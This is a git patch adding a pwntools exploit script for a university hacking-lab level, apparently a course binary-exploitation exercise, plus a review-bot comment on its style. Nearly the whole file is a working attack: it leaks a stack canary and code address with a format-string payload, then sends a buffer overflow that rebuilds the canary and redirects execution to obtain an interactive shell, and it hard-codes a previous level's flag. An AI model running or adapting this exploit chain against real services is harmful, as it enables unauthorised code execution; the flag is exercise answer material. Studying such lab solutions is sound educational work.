From 3e0859b09ee9bcc5aa75886a604b852bd92c9240 Mon Sep 17 00:00:00 2001
From: Eggert Jung
Date: Wed, 7 Jan 2026 14:26:07 +0100
Subject: [PATCH] 7

---
 4/level7/test.py | 82 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 82 insertions(+)
 create mode 100644 4/level7/test.py

diff --git a/4/level7/test.py b/4/level7/test.py
new file mode 100644
index 0000000..ff0aacb
--- /dev/null
+++ b/4/level7/test.py
@@ -0,0 +1,82 @@
+#!/usr/bin/env python3
+from pwn import *
+
+BINARY = "./level7"
+HOST, PORT = "binexp.stud12.hacklab.ias.tu-bs.de", 4007
+#HOST, PORT = "localhost", 4007
+
+elf = ELF(BINARY, checksec=False)
+
+def main():
+    # 1) start remote
+    p = remote(HOST, PORT)
+
+    # 2) read the question
+    question = p.recvline(timeout=2)
+    print("[+] question:", question.decode().strip())
+
+    question = p.recvline(timeout=2)
+    print("[+] question:", question.decode().strip())
+
+    payload = "hacklab{st4ck_c00k1es_w0nt_5top_y0u_G0HNiuT0}"
+    p.sendline(payload.encode())
+    print("sending: ", end='')
+    print(payload)
+
+    question = p.recvline(timeout=2)
+    print("[+] question:", question.decode().strip())
+
+    question = p.recvline(timeout=2)
+    print("[+] question:", question.decode().strip())
+
+    ##############
+
+    question = p.recv(timeout=999)
+    print("[+] got username prompt:", question.decode().strip())
+
+    # 3) build payload
+    #offset = 32
+    win = elf.symbols['win']
+    #payload = b"A"*offset
+    #payload += 0xa6#p64(win)
+    #payload += b"\n"
+    payload = "%7$p %9$p"
+    p.sendline(payload.encode())
+    print("sending: ", end='')
+    print(payload)
+
+    leak = p.recvline(timeout=999)
+    print("[+] leak:", leak)
+    canary = int(leak[-35:-17],16)
+    pieaddr = int(leak[-16:-2],16)
+    print("[+] canary:", hex(canary))
+    print("[+] pieaddr:", hex(pieaddr))
+
+    question = p.recv(timeout=999)
+    print("[+] got username prompt:", question.decode().strip())
+
+    p.sendline("admin".encode())
+    print("sending username \"admin\"")
+
+    question = p.recvline(timeout=999)
+    print("[+] got username msg:", question.decode().strip())
+
+    question = p.recv(timeout=999)
+    print("[+] got password prompt:", question.decode().strip())
+
+    payload = b"A"*40
+    payload += p64(canary)
+    payload += p64(pieaddr & 0xFFFFFFFFFFFFF000)
+    payload += p64((pieaddr & 0xFFFFFFFFFFFFF000)+0x229)
+    p.sendline(payload)
+    print("sending payload: ", payload)
+
+    question = p.recvline(timeout=999)
+    print("[+] got login msg:", question.decode().strip())
+
+
+    # 5) we should now have a shell
+    p.interactive()
+
+if __name__ == "__main__":
+    main()
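Review bot: `win = elf.symbols['win']` is assigned in step 3 but never read, so the module-level `elf = ELF(BINARY, checksec=False)` load exists only to feed dead code; drop both together with the commented-out `#offset`/`#payload` lines, or leave a one-line comment saying why they are kept. The transcript labels are also misleading: every `recvline` result is printed as `[+] question:` and every `recv` as `[+] got username prompt:` regardless of what was actually read, which makes a failed run hard to read back; a neutral tag such as `print("[+] recv:", question.decode().strip())` would be clearer. Minor style: `p.sendline("admin".encode())` reads more naturally as `p.sendline(b"admin")`, matching the bytes literals used for the final payload.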